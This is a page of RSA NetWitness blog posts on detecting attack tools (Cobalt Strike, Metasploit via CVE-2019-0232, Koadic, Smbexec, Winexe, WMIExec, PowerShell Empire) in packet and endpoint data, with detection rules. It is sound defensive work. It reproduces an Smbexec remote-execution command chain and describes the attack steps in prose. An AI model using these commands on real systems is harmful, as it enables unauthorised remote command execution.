Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > Author: Lee Kirkpatrick
1 2 Previous Next

RSA NetWitness Platform

17 Posts authored by: Lee Kirkpatrick Employee

I have recently been posting a number of blogs regarding the usage of the RSA NeWitness Platform to detect attackers within your environment. As the list of the blogs grow, it is becoming increasingly difficult to navigate through them easily. In order to combat this, this blog post will contain references to all other blog posts in the Profiling Attackers Series, and will be updated when new posts are made.

 

 

 

 

 

 

 

Special thanks to Rui Ataide for his support and guidance for these posts.

Introduction

Cobalt Strike is a threat emulation tool used by red teams and advanced persistent threats for gaining and maintaining a foothold on networks. This blog post will cover the detection of Cobalt Strike based off a piece of malware identified from Virus Total:

 

NOTE: The malware sample was downloaded and executed in a malware VM under analysts constant supervision as this was/is live malware.

The Detection in NetWitness Packets

NetWitness Packets pulls apart characteristics of the traffic it sees. It does this via a number of Lua parsers that reside on the Packet Decoder itself. Some of the Lua parsers have option files associated with them that parse out additional metadata for analysis. One of these is the HTTP Lua parser, which has an associated HTTP Lua options file, you can view this by navigating to Admin  Services ⮞ Decoder ⮞ Config ⮞ Files - and selecting HTTP_lua_options.lua from the drop down. The option we are interested in for this blog post is the headerCatalog() - making this return true will register the HTTP Headers in the request and response under the meta keys:

  • http.request
  • http.response

 

And the associated values for the headers will be registered under:

  • req.uniq
  • resp.uniq

 

NOTE: This feature is not available in the default options file due to potential performance considerations it may have on the Decoder. This feature is experimental and may be deprecated at any time, so please use this feature with caution, and monitor the health of all components if enabling. Also, please look into the customHeader() function prior to enabling this, as that is a less intensive substitute that could fit your use cases.

 

There are a variety of options that can be enabled here. For more details, it is suggested to read the Hunting Guide - https://community.rsa.com/docs/DOC-62341.

 

These keys will need to be indexed on the Concentrator, and the following addition to the index-concentrator-custom.xml file is suggested:

<key description="HTTP Request Header" format="Text" level="IndexValues" name="http.request" defaultAction="Closed" valueMax="5000" />
<key description="HTTP Response Header" format="Text" level="IndexValues" name="http.response" defaultAction="Closed" valueMax="5000" />
<key description="Unique HTTP Request Header" level="IndexKeys" name="req.uniq" format="Text" defaultAction="Closed"/>
<key description="Unique HTTP Response Header" level="IndexKeys" name="resp.uniq" format="Text" defaultAction="Closed"/>

 

 

The purpose for this, amongst others, is that the trial version of Cobalt Strike has a distinctive HTTP Header that we, as analysts, would like to see: https://blog.cobaltstrike.com/2015/10/14/the-cobalt-strike-trials-evil-bit/. This HTTP header is X-Malware - and with our new option enabled, this header is easy to spot:

NOTE: While this is one use case to demonstrate the value of extracting the HTTP Headers, this metadata proves incredibly valueable across the board, as looking for uncommon headers can help lead analysts to uncover and track malicious activity. Another example where this was useful can be seen in one of the previous posts regarding POSH C2, whereby an application rule was created to look for the incorrectly supplied cachecontrol HTTP response header: https://community.rsa.com/community/products/netwitness/blog/2019/03/04/command-and-control-poshc2

 

Pivoting off this header and opening the Event Analysis view, we can see a HTTP GET request for KHSw, which was direct to IP over port 666 and had a low header count with no referrer - this should stand out as suspicious even without the initial indicator we used for analysis:

 

If we had decided to look for traffic using the Service Analysis key, which pulls apart the characteristics of the traffic, we would have been able to pivot of off these metadata values to whittle down our traffic to this as well:

 

Looking into the response for the GET request, we can see the X-Malware header we pivoted off of, and the stager being downloaded. Also, take notice of the EICAR test string in the X-Malware as well, this is indicative of a trial version of Cobalt Strike as well:

 

NetWitness Packets also has a parser to detect this string, and will populate the metadata, eicar test string, under the Session Analysis meta key (if the Eicar Lua parser is pushed from RSA Live) - this could be another great pivot point to detect this type of traffic:

 

Further looking into the Cobalt Strike traffic, we can start to uncover more details surrounding its behaviour. Upon analysis, we can see that there are multiple HTTP GET requests with no error (i.e. 200), and a content-length of zero, which stands out as suspicious behaviour - as well as this, there is a cookie that looks like a Base64 encoded string (equals at the end for padding) with no name/value pairs, cookies normally consist of name/value pairs, these two observations make the cookie anomalous:

 

Based off of this behaviour, we can start to think about how to build content to detect this type of behaviour. Heading back to our HTTP Lua options file on the Decoder, we can see another option named, customHeaders() - this allows us to extract the values of HTTP headers in a field of our choosing. This means we can choose to extract the cookie into a meta key named cookie, and content-length into a key named http.respsize - this allows us to map a specific HTTP header value to a key so we can create some content based off of the behaviours we previously observed:

 

After making the above change, we need to add the following keys to our index-concentrator-custom.xml file as well - these are set to the index level of, keys, as the values that can be returned are unbounded and we don't want to bloat the index:

<key description="Cookie" format="Text" level="IndexKeys" name="cookie" defaultAction="Closed"  />
<key description="HTTP Response Size" format="Text" level="IndexKeys" name="http.respsize" defaultAction="Closed" />

 

Now we can work on creating our application rules. Firstly, we wanted to alert on the suspicious GET requests we were seeing:

service = 80 && action = 'get' && error !exists && http.respsize = '0' && content='application/octet-stream'

And for the anomalous cookie, we can use the following logic. This will look for no name/value pairs being present and the use of equals signs at the end of the string which can indicate padding for Base64 encoded strings:

service = 80 && cookie regex '^[^=]+=*$' && content='application/octet-stream'

These will be two separate application rules that will be pushed to the Decoders:

 

Now we can start to track the activity of Cobalt Strike easily in the Investigate view. This could also potentially alert the analyst to other infected hosts in their environment. This is why it is important to analyse the malicious traffic and create content to track:

 

Conclusion

Cobalt Strike is a very malleable tool. This means that the indicators we have used here will not detect all instances of Cobalt Strike, with that being said, this is known common Cobalt Strike behaviour. This blog post was intended to showcase how the usage of the HTTP Lua options file can be imperative in identifying anomalous traffic in your environment whilst using real-world Live malware. The extraction of the HTTP headers, whilst a trivial piece of information, can be vital in detecting advanced tools used by attackers. This coupled with the extraction of the values themselves, can help your analysts to create more advanced higher fidelity content.

Preface
In order to prevent confusion, I wanted to add a little snippet before we jump into the analysis. The blog post
first goes over how the server became infected with Metasploit, it was using a remote execution CVE
against an Apache Tomcat Web Server, the details of which can be found here, https://nvd.nist.gov/vuln/detail/
CVE-2019-0232. Further into the blog post, details of Metasploit can be seen.

 

This CVE requires that the CGI Servlet in Apache Tomcat is enabled. This is not an abnormal servlet to be
enabled and merely requires the Administrator to uncomment a few lines in the Tomcat web.xml. This is a
normal administrative action to have taken on the Web Server:

  


Now, if the administrator has a .bat, or .cmd file in the cgi-bin directory on the Apache Tomcat Server. The
attacker can remotely execute commands as Apache will call cmd.exe to execute the .bat or .cmd file and
incorrectly handle the parameters passed; this file can contain anything, as long as it executes. So here as an
example, we place a simple .bat file in the cgi-bin directory:

 

From a browser, the attacker can call the .bat file and pass a command to execute due to the way the CGI
Servlet handles this request and passes the arguments:

 

From here, the attacker can create a payload using msfvenom and instruct the web server to download the Metasploit payload they had created:

 

The Detection in NetWitness Packets

RCE Exploit
NetWitness Packets does a fantastic job pulling apart the behaviour of network traffic. This allows analysts to
detect attacks even with no prior knowledge of them. A fantastic meta value for analysts to look at is windows
cli admin commands, this metadata is created when cli commands are detected; grouping this metadata with inbound
traffic to your web servers is a great pivot point to start looking for malicious traffic:

 

NOTE: Taking advantage of the traffic_flow_options.lua parser would be highly beneficial for your SOC. This parser allows you to define your subnets and tag them with friendly names. Editing this to contain your web servers address space for example, would be a great idea.

 

Taking the above note into account, your analysts could then construct a query like the following:
(analysis.service = 'windows cli admin commands') && (direction = 'inbound') && (netname.dst = 'webservers')
Filtering on this metadata reduces the traffic quite significantly. From here, we can open up other meta
keys to get a better understanding of what traffic is related to these windows cli commands. From the below
screenshot, we can see that this is HTTP traffic, with a GET request to a hello.bat file in the /cgi-bin/ directory,
there are also some suspicious looking queries associated with it that appear to reference command line
arguments:

 

At this point, we decide to reconstruct the raw sessions themselves as we have some suspicions surrounding
this traffic to see exactly what these HTTP sessions are. Upon doing so, we can see a GET request with the
dir command, and we can also see the dir output in the response - this will be what the windows cli admin
commands metadata was picking up on:

 

This traffic instantly stands out as something of interest and as being something that requires further
investigation. In order to get a holistic view of all data toward this server, we need to reconstruct our query, as
the windows cli admin commands metadata would have only picked up on the sessions where it saw CLI
commands, we are, however, interested in seeing it all. So we look at the metadata available for this session
and build a new query. This now allows us to see other interesting metadata and get a better idea of what the
attacker was doing. Looking at the Query meta key, we can see all of the attackers commands:

 

Navigating to the Event Analysis view, we can see the commands in the order they took place and reconstruct
what the attacker was doing. From here we can see a sequence of events whereby the attacker makes a
directory, C:\temp, downloads an executable called 2.exe to said directory, and subsequently executes it:

 

MSF File and Traffic

As we can see the attackers commands, we can also see the download for an executable they performed, a.exe. This means we can run a query and extract that file from the packet data as well. We run a simple query looking for a.exe
and we find our session. Also, take note of the user agent, why is certutil being used to download a.exe? This is also a great indicator of something suspicious:

 

We can also choose to switch to the File Analysis view and download our file(s). This would allow us to perform additional analysis on the file(s) in question:

 

Merely running a strings on one of these files yields a result of a domain this executable may potentially connect to:

 

As we also have another hostname to add to our analysis, we can now perform a query on just this hostname
to see if there is any other interesting metadata associated with it. Opening the session analysis meta key, we can see a myriad of interesting pivot points. We can group these pivot points together, or make combinations of them to whittle down the traffic to something more manageable:

NOTE: See the RSA IR Hunting guide for more details on these metadata values: https://community.rsa.com/docs/DOC-62341

 

Once we have pivoted down using some of the metadata above, we start to get down to a more manageable amount of sessions - continuing looking at the service analysis meta key we also observe some additional pieces of metadata of interest we can use to start reconstructing the sessions to get a better understanding of what this traffic is:

 

  • long connection
  • http no referer
  • http six or less headers
  • http post missing content-type
  • http no user-agent
  • watchlist file fingerprint

 

 

Opening these sessions up in the Event Analysis view, we can see an HTTP POST with binary data, and a 200 OK from the supposed Apache Server, we can also see the directory is the same as we saw from our strings analysis:

 

Continuing to browse through these sessions, yields more of the same:

 

Navigating back to the investigate view, it is also possible to see that the directory is always the same and the one we saw in our strings analysis:

 

NOTE: During the analysis, no beaconing pattern was observed, this can make the C2 harder to detect and requires continued threat hunting from your analysts to understand your environment and pick up on these types of anomalies.

 

Web Shell

Now we know that the Apache Tomcat Web Server is infected, we can look at all other traffic
associated with the Web Server and continue to monitor to see if anything else takes place, attackers like to keep
multiple entry points if possible. Focusing on our Web Server, we can also see a JSP page being accessed
that sounds odd, error2.jsp, and observe some additional queries:

 

Pivoting into the Event Analysis view and reconstructing the sessions, we can see a tasklist command being
executed:

 

And the subsequent response of the tasklist output. This is a Web Shell that has been placed on the server and
the attacker is also using to execute commands:

 

NOTE: For more information on Web Shells, see the following series: https://community.rsa.com/community/products/netwitness/blog/2019/02/12/web-shells-and-netwitness

 

It is important to note that just because you have identified one method of remote access, it does not mean that
is the only one, it is important to ascertain whether or not other access methods were made available by the
attacker.

 

The Detection in NetWitness Endpoint
As I preach in every blog post, the analyst should always log in every morning and check the following
three meta keys as a priority, IOC (Indicators of Compromise), BOC (Behaviours of Compromise), and EOC
(Enablers of Compromise). Looking at these keys, a myriad of pieces of metadata stand out as great places to
start the investigation, but let's place a focus on these three for now:

 

Let's take the downloads binary using certutil to start, and pivot into the Event Analysis view. Here we
can see the certutil binary being used to download a variety of the executable we saw in the packet data:

 

Looking into one of the other behaviours of compromise, http daemon runs command shell, we can also
see evidence of the bat file being requested and the associated commands, as well as the use of the Web
Shell, error2.jsp. It is also important to note that there is a request for the hello.bat prior to the remote code
execution vulnerability being exploited, this would be seen as legitimate traffic given that the server is working
as designed for the CGI-BIN scripts. It is down to the analyst to review the traffic and decipher whether or not
something malicious is happening, or whether this is by design of the server:

 

NOTE: Due to the nature of how the Tomcat server handles the vulnerable cgi-bin application and "legitimate" JSP files, you can see hello.bat as part of the tracking event as it's an argument passed to cmd.exe. However, with the error2.jsp, it is executed inside the Tomcat process, and only when the web shell spawns a new command shell to execute certain commands will you see cmd.exe being executed, and not every time error2.jsp is used. Having said that, the advantage for the defender is that even if not all of it is tracked, or leaves a visible footprint, at some point something will, this will/ could be the starting thread needed to detect the intrusion.

 

Coming back to the Investigate view we can see another interesting piece of metadata that would be of interest, creates remote service - let's pivot on this and see what took place:

Here we can see that cmd was used to create a service on our Web Server that would run a malicious binary dropped by the attacker in the c:\temp directory:

 

It is important to remember that as a defender, you only need to pick up on one of these artifacts leftover from
the attacker in order to start unraveling their activity.

 

Conclusion
With today's ever-changing landscape, it is becoming increasingly inefficient to create signatures for known
vulnerabilities and attacks. It is therefore far more important to pick up on behaviours of traffic that stand out as
abnormal, than generating signatures. As shown in this blog post, a fairly recent remote code execution CVE
was exploited, https://nvd.nist.gov/vuln/detail/CVE-2019-0232 - no signatures were required to pick up on this
as NetWitness pulls apart the behaviours, we just had to follow the path. Similarly, with Metasploit it is also very difficult to generate effective long life signatures that could detect this C2; performing
threat hunting through the data based on a foundation of analysing behaviours, will ensure that all knowns and
unknowns are effectively analysed.

 

It is also important to note that the packet traffic would typically be encrypted but we kept it in the clear for the purposes of this post, with that being said, the RCE exploit and Web Shell is easily detectable when NetWitness Endpoint tracking data is being ingested, and this allows the defender to have the necessary visibility if SSL decryption is not in place.

Attackers love to use readily available red team tools for various stages within their attack. They do so as this removes the labour required in creating their own custom tools. This is not to say that the more innovative APT's are going down this route, but just something that appears to be becoming more prevalent and your analysts should be aware of. This blog post covers a readily available red team tool available on GitHub.

 

Tools

In this blog post, the Koadic C2 will be used. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 

 

The Attack

The attacker sets up their Koadic listener and builds a malicious email to send to their victim. The attacker wants the victim to run their malicious code, and in order to do this, they tried to make the email look more legitimate by supplying a Dropbox link, and a password for the file:

 

The user downloads the ZIP, decompresses using the password in the email, and is presented with a Javascript file that has a .doc extension. Here the attacker is relying on the victim not being well versed with computers, and not noticing the obvious problems with this file (extension, icon, etc.):

 

 

 

Fortunately for the attacker, the victim double clicks the file to open it and they get a call back to their C2:

 

From here, the attacker can start to execute commands:

 

 

The Detection in NetWitness Packets

The analyst begins their investigation by placing a focus on looking for C2 traffic over HTTP. From here, the analyst the can start to pull apart the protocol and look for anomalies within its behaviour; the analyst opens the Service Analysis meta key to do this and observed two pieces of metadata of interest:

 

  • http post missing content-type

  • http post no get

 

 

 

These two queries have now reduced the data set for the analyst from 2,538 sessions to 67:

 

NOTE: This is not to say that the other sessions do not have malicious traffic, nor that the analyst will ignore them, but just at this point in time this is the analysts focal point. If this traffic after analysis turned out to be clean, they could exclude it from their search and pick apart other anomalous HTTP traffic in the same manner as before. This allows the analyst to go though the data in a more comprehensive and approachable manner.

 

Now that the data set has been reduced, the analyst can start open other meta keys to see understand the context of the traffic. The analyst wants to see if any files are being transferred, and to see what user agents are involved, to do so, they open the Extension, Filename, and Client Application meta key. Here they observe an extension they do not typically see during their daily hunting, WSF. They see what appears to be a random filename, and a user agent they are not overly familiar with:

 

There are only eight sessions for this traffic, so the analyst is now at a point where they could start to reconstruct the raw sessions and see what if they can better understand what this traffic is for. Opening the Event Analysis view, the analyst first looks to see if they can observe any pattern in the connection times, and to look at how much the payload varies in size:

NOTE: Low variation in payload size and connections that take place every x minutes is indicative of automated behaviour. Whether that behaviour is malicious or not is up to the analyst to decipher, this could be a simple weather update for example, but this sort of automated traffic is exactly what the analyst should be looking for when it comes to C2 communication; weeding out the user generated traffic to get to the automated communications.

 

Reconstructing the sessions, the analyst stumbles across a session that contains a tasklist output. This immediately stands out as suspicious to the analyst:

 

From here, the analyst can build a query to focus on this communication between these two hosts and find out when this activity started happening:

 

Looking into the first sessions of this activity, the analyst can see a GET request for the oddly named WSF file, and that BITS was used to download it:

 

The response for this file contains the malicious javascript that infected the endpoint:

 

Further perusing the sessions, it is also possible to see the commands being executed by the attacker:

 

The analyst is now extremely confident this is malicious traffic and needs to be able to track it. The best way to do this is with an application rule. The analyst looks through the traffic and decides upon the following two pieces of logic to detect this behaviour:

 

To detect the initial infection:

extension = 'wsf' && client contains 'bits'

To detect the beacons:

extension = 'wsf' && query contains 'csrf='

 

NOTE: The activity observed was only possible due to the communication happening over HTTP. If this had been SSL, the detection via packets would be much more difficult. This is why introducing SSL Decryption/Interception/Offloading is highly recommended. SSL inspection devices are nothing more than a well-designed man-in-the-middle attack that breaks the encryption into two separate encrypted streams. Therefore, they still provide an adequate level of protection to end-users while allowing security analysts and devices to properly monitor and alert when malicious or unwanted activity takes place, such as the web shells shown here. In summary, if you are responsible for protecting your organization’s assets, you should definitely consider the pros and cons of using this technology.

 

The Detection in NetWitness Endpoint

Every day the analyst should review the IOC, BOC, and EOC meta keys; paying particular attention to the high-risk indicators first. Here the analyst can see a high-risk meta value, transfers file using bits:

 

Here the analyst can see cmd.exe spawning bitsadmin.exe and downloading a suspiciously named file into the \AppData\Local\Temp\ directory. This stands out as suspicious to the analyst:

 

From here, the analyst places an analytical lens on this specific host and begins to look through what other actions took place around the same time. The analyst observes commands being executed against this endpoint and now knows it is infected:

 

Conclusion

Understanding the nuances between user based behavior and mechanical behavior gives an advantage to the analyst who is performing threat hunting. If the analyst understands what "normal" should look like within their environment, they can easily discern it from abnormal behaviors.

 

Analysts should also be aware that not all attackers will use proprietary tools, or even alter the readily available ones to evade detection. An attacker only needs to make one mistake and you can unravel their whole their operation. So don't always ignore the low hanging fruit.

Introduction

Lateral movement is a technique that enables an adversary to access and control remote systems on a network. It is a critical phase in any attack, and understanding the methods that can be used to perform lateral movement, along with how those protocols display themselves in NetWitness, is paramount in detecting attackers moving laterally in your environment. It is also important to understand that many of the mechanisms used by attackers for lateral movement, are also used by administrators for legitimate reasons, and thus why it is important to monitor these mechanisms to understand what is typical behaviour, and what is not.

 

Tools

In this blog post, Smbexec will be used. the Impackets implementation of Smbexec will be used. This sets up a semi-interactive shell for the attacker.

 

The Attack

The attacker has successfully gained access to your network and dumped credentials, all without any detection from your Security Operations Center (SOC). The attacker decides to move laterally using Smbexec, they connect to one of the hosts they had previously identified and begin to execute commands:

 

The Detection in NetWitness Packets

Smbexec works a little differently to some of the more common lateral movement tools such as PsExec. Instead of transferring a binary to the target endpoint and using the svcctl interface to remotely create a service using the transferred binary and start the service, Smbexec makes a call to an existing binary that already lives on that endpoint to execute its commands, cmd.exe.

 

NetWitness Packets does a great job at pulling apart packet data and pointing you in directions of interest. One of the metadata we can pivot on to focus on traffic that is of interest to us for lateral movement is, remote service control:

 

NetWitness also creates metadata when it observes windows cli commands being run, this metadata is under the Service Analysis meta key and is displayed as, windows cli admin commands. This would be another interesting pivot point for us to look into to see what type of commands are being executed:

 

NOTE: Just because an endpoint is being remotely controlled, and there are commands being executed on the endpoint, this does not mean that your network is compromised. It is up to the analyst to review the sessions of interest like we are in this blog post, and determine if something is out of the ordinary for your environment.

 

Looking into the other metadata available, we can see a connection to the C$ share, and that a filename called __output was created:

 

This does not give us much to go on and say that this is suspicious, so it is necessary to reconstruct the raw session itself to get a better idea of what is happening. Opening the Event Analysis view for the session we reduced our data set to, and analysing the payload, a suspicious string stands out as shown below:

 

Tidying up the command a little, it ends up looking like this:

%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

  • %COMPSEC% - Environment variable that points to cmd.exe
  • /Q - Turns echo off
  • /C - Carries out the command specified by string and then terminates
  • %TEMP% - Environment variable that points to C:\Users\username\AppData\Local\Temp

 

We can see that string above will echo the command we want to execute (dir) into a file named "__output" on the C$ share of the local machine. The command we want to execute also gets placed into execute.bat in the %TEMP% directory, which is subsequently executed, and then deleted.

 

Analysing the payload further, we can also see the data that is returned from the command that was executed by the attacker:

 

Now that suspicious traffic has been observed, we can filter on this type of traffic, and see other commands being executed, such as whoami:

 

Smbexec is quite malleable, a vast majority of the indicators can easily be edited to evade signature type detection for this behaviour. However, using NetWitness Packets ability to carve out behaviours, the following application rule logic, should be suitable to pick up on suspicious traffic over SMB that an analyst should investigate to detect this type of behaviour:

(ioc = 'remote service control') && (analysis.service = 'windows cli admin commands') && (service = 139) && (directory = '\\c$\\','\\ADMIN$\\') 

 

The Detection in NetWitness Endpoint

NetWitness Endpoint does a great job at picking up on this activity, looking at the Behaviours of Compromise meta key, two pieces of metadata point the analyst toward this activity, services runs command shell and runs chained command shell:

 

Opening the Event Analysis view for these sessions, we can see that services.exe is spawning cmd.exe, and we can also see the command that is being executed by the attacker:

 

The default behaviour of Smbexec could easily be detected with application rule logic like the following:

param.dst contains '\\127.0.0.1\C$\__output'

Conclusion

Understanding the Tools, Techniques, and Procedures (TTP's) used by attackers, coupled with understanding how NetWitness interprets those TTP's, is imperative in being able to identify them within your network. The NetWitness suite has great capabilities to pull apart network traffic and pick up on anomalies, which makes it easier for the analysts to hunt down and detect these threats.

Introduction

Lateral movement is a technique that enables an adversary to access and control remote systems on a network. It is a critical phase in any attack, and understanding the methods that can be used to perform lateral movement, along with how those protocols display themselves in NetWitness, is paramount in detecting attackers moving laterally in your environment. It is also important to understand that many of the mechanisms used by attackers for lateral movement, are also used by administrators for legitimate reasons, and thus why it is important to monitor these mechanisms to understand what is typical behaviour, and what is not.

 

Tools

In this blog post, Winexe will be used. Winexe is a GNU/Linux based application that allows users to execute commands remotely on WindowsNT/2000/XP/2003/Vista/7/8 systems. It installs a service on the remote system, executes the command and uninstalls the service. Winexe allows execution of most of the windows shell commands.

 

The Attack

The attacker has successfully gained access to your network and dumped credentials, all without any detection from your Security Operations Center (SOC). The attacker decides to move laterally using Winexe, they connect to one of the hosts they had previously identified and begin to execute commands:

 

The Detection in NetWitness Packets

The use of Winexe is not overly stealthy. Its use creates a large amount of noise that is easily detectable. Searching for winexesvc.exe within the filename metadata returns the SMB transfer of the executable to the ADMIN$ share:

 

Using the time the file transfer took place as the pivot point to continue investigation, it is also possible to see the use of the Windows Service Control Manager (SCM) directly afterward to create and start a service on the remote endpoint. SCM acts as a remote procedure call (RPC) server so that services on remote endpoints can be controlled:

 

Reconstructing the raw session as text, it is possible to see the service name being created, winexesvc, and the associated executable that was previously transferred being used as the service base, winexesvc,exe:

 

Continuing to analyse the SMB traffic around the same time frame, it is also possible to see another named pipe, ahexec, being used. This is the named pipe that Winexe uses:

 

Reconstructing these raw sessions as text, it is possible to see the commands that were executed:

 

As well as the output that was returned to the attacker:

 

Based on the artefacts we have seen leftover from Winexe's execution over the network, there are multiple pieces of logic we could use for our application rule to detect this type of traffic. The following application rule logic would pick up on the initial transfer of the winexesvc.exe executable, and the subsequent use of the named pipe, ahexec:

(filename = 'ahexec','winexesvc.exe') && (service = 139)

The Detection in NetWitness Endpoint

Searching for winexesvc.exe as the filename source shows the usage of Winexe on the endpoints, this is because this is the executable that handles the commands sent to over the ahexec named pipe. The filename destination meta key shows the executables invoked via the use of Winexe:

 

A simple application rule could be created for this activity by simply looking for winexesvc.exe as the filename source:

(filename.src = 'winexesvc.exe')

 

Additional Analysis

Analysing the endpoint, you can see the winexesvc.exe process running from task manager:

 

As well as the service that was installed via SCM over the network:

 

This service creation also creates a log entry in the System event log as event ID 7045:

 

This means if you were ingesting logs into NetWitness, you could create an application rule to trigger on Winexe usage with the following logic:

(reference.id = '7045') && (service.name = 'winexesvc')

We can also see the named pipe which Winexe uses by executing Sysinternals pipelist tool:

Introduction

Lateral movement is a technique that enables an adversary to access and control remote systems on a network. It is a critical phase in any attack, and understanding the methods that can be used to perform lateral movement, along with how those protocols display themselves in NetWitness, is paramount in detecting attackers moving laterally in your environment. It is also important to understand that many of the mechanisms used by attackers for lateral movement, are also used by administrators for legitimate reasons, and thus why it is important to monitor these mechanisms to understand what is typical behaviour, and what is not.

 

What is WMI?

At a high level, Windows Management instrumentation (WMI) provides the ability to, locally or remotely, manage servers and workstations running Windows by allowing data collection, administration, and remote execution. WMI is Microsoft's implementation of the open standard, Web-Based Enterprise Management (WBEM) and Common Information Model (CIM), and comes preinstalled in Windows 2000 and newer Microsoft Operating Systems.

 

Tools

In this blog post, the Impackets implementation of WMIExec will be used. This sets up a semi-interactive shell for the attacker. WMI can be used for reconnaissance, privilege escalation (by looking for well-known misconfigurations), and lateral movement.

 

The Attack

The attacker has successfully gained access to your network and dumped credentials, all without any detection from your Security Operations Center (SOC). The attacker decides to move laterally using WMIExec, they connect to one of the hosts they had previously identified and begin to execute commands:

 

The Detection in NetWitness Packets

NetWitness Packets can easily identify WMI remote execution. All the analyst needs to do is open the Indicators of Compromise (IOC) meta key and look for wmi command:

 

Pivoting on the wmi command metadata, and opening the Action meta key, the analyst can observe the commands that were executed, as these are sent in clear text:

 

NOTE: Not all WMI commands are malicious. It is up to the analyst to understand what is normal behaviour within their environment, and what is not. The commands seen above are typical of WMIExec however, and should raise concern for the analyst.

 

The following screenshot is of the raw data itself. Here it is possible to see the parameter that was passed and subsequently registered under the action meta key:

 

Looking at the parameter passed, it is possible to see that WMIExec uses CMD to execute its command and output the result to a file (which is named the timestamp of execution) on the ADMIN$ share of the local system. The following screenshot shows an example of whoami being run, and the associated output file and contents on the remote host:

 

NOTE: This file is removed after it has been successfully read and displayed back to the attacker. Evidence of this file only exists on the system for a small amount of time.

 

We can get a better understanding of WMIExec's function from viewing the source code:

 

To detect WMIExec activity in NetWitness Packets, the following application rule logic could be created to detect it:

action contains'127.0.0.1\\admin$\\__1'

Lateral traffic is seldom captured by NetWitness Packets. More often than not, the focus of packet capture is placed on the ingress and egress points of the network, normally due to high volumes of core traffic that significantly increase costs for monitoring. This is why it is important to also have an endpoint detection product, such as NetWitness Endpoint to detect lateral movement.

 

The Detection in NetWitness Endpoint

A daily activity for the analyst should be to check the Indicators of Compromise (IOC), Behaviours of Compromise (BOC), and Enables of Compromise (EOC) meta keys. Upon doing so, the analyst would observe the following metadata, wmiprvse runs command shell:

 

Drilling into this metadata, and opening the Event Analysis view, it is possible to see the WMI Provider Service spawning CMD and executing commands:

 

To detect WMIExec activity in NetWitness Endpoint, the following application rule logic could be created to detect it:

param.dst contains '127.0.0.1\\admin$\\__1'

Conclusion

Understanding the Tools, Techniques, and Procedures (TTP's) used by attackers, coupled with understanding how NetWitness interprets those TTP's, is imperative in being able to identify them within your network. The NetWitness suite has great capabilities to pull apart network traffic and pick up on anomalies, which makes it easier for the analysts to hunt down and detect these threats.

 

WMI is a legitimate Microsoft tool that is used within environments by administrators, as well as by 3rd party products, it can therefore be difficult to differentiate normal from malicious, and why it is a popular tool for attackers. Performing Threat Hunting daily is an important activity for your analysts to build baselines and detect the anomalous usage from the normal activity.

There are a myriad of post exploitation frameworks that can be deployed and utilized by anyone. These frameworks are great to stand up as a defender to get an insight into what C&C (command and control) traffic can look like, and how to differentiate it from normal user behavior. The following blog post demonstrates an endpoint becoming infected, and the subsequent analysis in RSA NetWitness of the traffic from PowerShell Empire. 

 

The Attack

The attacker sets up a malicious page which contains their payload. The attacker can then use a phishing email to lure the victim into visiting the page. Upon the user opening the page, a PowerShell command is executed that infects the endpoint and is invisible to the end user:

 

 

The endpoint then starts communicating back to the attacker's C2. From here, the attacker can execute commands such as tasklistwhoami, and other tools:

 

From here onward, the command and control would continue to beacon at a designated interval to check back for commands. This is typically what the analyst will need to look for to determine which of their endpoints are infected.

 

The Detection Using RSA NetWitness Network/Packet Data

The activity observed was only possible due to the communication happening over HTTP. If this had been SSL, the detection via packets would be much more difficult. This is why introducing SSL Decryption/Interception/Offloading is highly recommended. SSL inspection devices are nothing more than a well-designed man-in-the-middle attack that breaks the encryption into two separate encrypted streams. Therefore, they still provide an adequate level of protection to end-users while allowing security analysts and devices to properly monitor and alert when malicious or unwanted activity takes place, such as the web shells shown here. In summary, if you are responsible for protecting your organization’s assets, you should definitely consider the pros and cons of using this technology.

 

The analyst begins their investigation by placing a focus on looking for C2 traffic over HTTP. The analyst can then look into pulling apart the characteristics of the protocol by using the Service Analysis meta key. From here they notice a couple interesting meta values to pivot on, http with binary and http post no get no referer directtoip:

 

Upon reducing the number of sessions to a more manageable number, the analyst can then look into other meta keys to see if there are any interesting artifacts. The analyst look under the Filename, Directory, Client Application, and Server Application meta keys, and observes the communication is always towards a microsft-iis/7.5 server, from the same user agent, and toward a subset of PHP files:

 

The analyst decides to use this is as a pivot point, and removes some of the other more refined queries, to focus on all communication toward those PHP files, from that user agent, and toward that IIS server version. The analyst now observes additional communication: 

 

Opening up the visualization, the analyst can view the cadence of the communication and observes there to be a beacon type pattern:

 

Pivoting into the Event Analysis view, the analyst can look into a few more details to see if there suspicions on this being malicious are true. The analyst observes a low variance in payload, and a connection which is taking place ~every 4 minutes:

 

The analyst reconstructs some of the sessions to see the type of data being transferred, the analyst observes a variety of suspicious GET and POST's with varying data being transferred:

 

The analyst confirms this traffic is highly suspicious based of the analysis they have performed, the analyst subsequently decides to track the activity with an application rule. To do this, the analyst looks through the metadata associated with this traffic, and finds a unique combination of metadata that identifies this type of traffic:

 

(service = 80) && (analysis.service = 'http1.0 unsupported cache header') && (analysis.service = 'http post missing content-type')

 

IMPORTANT NOTE: Application rules are very useful for tracking activity. They are however, very environment specific, therefore an application rule used in one environment, may be of high fidelity, but when used in another, could be incredibly noisy. Care should be taken when creating or using application rules to make sure they work well within your environment.

 

The Detection Using RSA NetWitness Endpoint Tracking Data

The analyst, as they should on a daily basis, is perusing the IOC, BOC, and EOC meta keys for suspicious activity. Upon doing so, they observe the metadata, browser runs powershell and begin to investigate:

 

Pivoting into the Event Analysis view, the analyst can see that Internet Explorer spawned PowerShell, and subsequently the PowerShell that was executed:

 

The analyst decides to decode the base64 to get a better idea as to what the PowerShell is executing. The analyst observes the PowerShell is setting up a web request, and can see the parameters it would be supplying for said request. From here, the analyst could leverage this information and start looking for indicators of this in their packet data (this demonstrates the power behind having both Endpoint, and Packet solutions):

 

Pivoting in on the PowerShell that was launched, it is also possible to see the whoami and tasklist that was executed as well. This would help the analyst to paint a picture as to what the attacker was doing: 

 

Conclusion

The traffic outlined in this blog post is of a default configuration for PowerShell Empire; it is therefore possible for the indicators to be different depending upon who sets up the instance of PowerShell Empire. With that being said, C2's still need to check-in, C2's will still need to deploy their payload, and C2's will still perform suspicious tasks on the endpoint. The analyst only needs to pick up on one of these activities to start pulling on a thread and unwinding the attackers activity,

 

